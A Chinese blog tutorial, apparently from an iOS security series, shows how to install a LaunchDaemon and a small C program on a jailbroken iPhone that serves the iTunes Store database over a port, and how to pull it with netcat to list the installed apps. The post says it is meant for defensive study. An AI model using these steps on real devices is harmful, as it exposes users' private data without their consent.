後臺 daemon 非法竊取使用者 iTunesstore 資訊
本人鄭重宣告:並不鼓勵竊取使用者隱私等行為,一切 hack 學習都只是為了研究如何防禦。OK,進入正題。
開機自啟動
在 iOS 安全攻防(一):Hack必備的命令與工具中,介紹瞭如何編譯自己的 C 程式並手動啟動。今天介紹如何使程式變為開機自啟動。
首先開啟 Xcode 建立一個 plist 屬性檔案
其中要注意一下通訊服務名,我定為 55 。用編輯器開啟,即為:
最後,將 plist 檔案 scp 至 root@192.168.1.114:/System/Library/LaunchDaemons/下 。
編寫讀取 iTunesstore 資料庫程式
讀取 itunesstored2.sqlitedb 資訊,並輸出到 stdout 中,便於我們讀取。
#include#include#include#define FILE "/var/mobile/Library/com.apple.itunesstored/itunesstored2.sqlitedb"
int main(){
int fd = open(FILE, O_RDONLY);
char buf[128];
int ret = 0;
if(fd < 0)
return -1;
while (( ret = read(fd, buf, sizeof(buf))) > 0){
write( fileno(stdout), buf, ret);
}
close(fd);
return 0;
}
編譯、拷貝、簽名
編譯方法上篇文章已經介紹清楚,這裡不再重複,直接 ¥%¥#%¥……%# 生成執行在 ARM 的 ncdemo
將 ncdemo scp 到裝置中,並登入
$ scp ncdemo root@192.168.1.114:ncdemo
$ ssh root@192.168.1.114
簽名
#ldid -S ncdemo
#mv ncdemo /usr/bin
抓取 iTunesstore 資料資訊
這時,我們只需要利用 netcat,指定之前定義的服務名稱,輕鬆在本地抓取裝置 iTunesstore 資訊.
$ nc 192.168.1.114 55 > itunesstored2.sqlitedb
分析 iTunesstore 資料資訊
好吧,這裡就介紹個最簡單的應用,利用string命令檢視: $ strings itunesstored2.sqlitedb
於是乎,我們就清晰的得到了 iPhone/iPad 裝置上都安裝了哪些 app :
相關文章
- iOS安全攻防(二):後臺daemon非法竊取使用者iTunesstore資訊iOS
- 後臺執行緒(daemon)執行緒
- iOS攻防:如何竊取使用者的通訊錄資訊iOS
- 竊取使用者資訊,至尊藍月等遊戲隱憂難解遊戲
- 支付寶小程式(後臺)---獲取授權和使用者資訊
- Bitdefender:大部分免費應用會竊取使用者隱私資訊
- 蘋果開發者中心被黑:開發者資訊或被竊取蘋果
- 前亞馬遜僱員被控竊取一億第一資本銀行使用者資訊亞馬遜
- Atlas Quantum平臺使用者資訊遭竊,快去查一查賬戶資訊有無洩露
- 山東濟南一95後“黑客”竊取公民資訊被判三年半黑客
- 蘋果iOS有後門 能獲取使用者資訊蘋果iOS
- 新型惡意軟體 FFDorider :以近乎完美的偽裝竊取使用者個人資訊IDE
- 史上最大資料洩露案告破 上市公司竟竊取30億使用者資訊大資料
- 針對資訊竊取惡意軟體AZORult的分析
- 今日頭條、攜程等網際網路平臺非法蒐集使用者資訊,洩露使用者ID何時休
- 蘋果企業證書再爆醜聞 間諜軟體竊取使用者隱私資訊蘋果
- 竊取個人資訊售賣 黑客團伙被連窩端黑客
- 黑客如何竊取花旗銀行的客戶資訊黑客
- 細思極恐,麥克風竊取使用者隱私背後技術是這個
- 竊取簡歷逾2億 非法牟利過億——資料行業亂象“令人咋舌”亟待整治行業
- 小程式獲取使用者位置資訊後再次手動授權
- 屢見不鮮!Facebook再曝隱私事件:100名開發人員竊取使用者資訊事件
- Metasploit之令牌竊取
- 京東金融 APP 竊取使用者照片?它到底想幹嘛?APP
- 每日安全資訊:Stack Overflow 安全事件新進展:部分使用者私人資訊遭竊事件
- 加拿大航空手機App使用者資料被黑客竊取APP黑客
- 谷歌瀏覽器“SymStealer”漏洞:可竊取使用者敏感檔案谷歌瀏覽器
- 黑客技術—QQ竊取黑客
- java後臺獲取cookieJavaCookie
- 防止密碼被非法獲取 (轉)密碼
- 分析:關於 「關注後使用者資訊獲取介面」調整的通知
- 四黑客侵入遠端教育中心,竊取十萬學生資訊賺百萬黑客
- 新型Android木馬Xavier爆發:可悄然竊取你的個人資訊Android
- 微信小程式 獲取使用者資訊微信小程式
- BOSE耳機被控訴竊取使用者隱私 並出售私人資料
- 盜竊iPad使用者資訊黑客面臨5年鐵窗判決iPad黑客
- docker無法拉取(pull)映象Error response from daemonDockerError
- thinkphp5 後臺上傳圖片提示 image null 非法上傳檔案PHPNull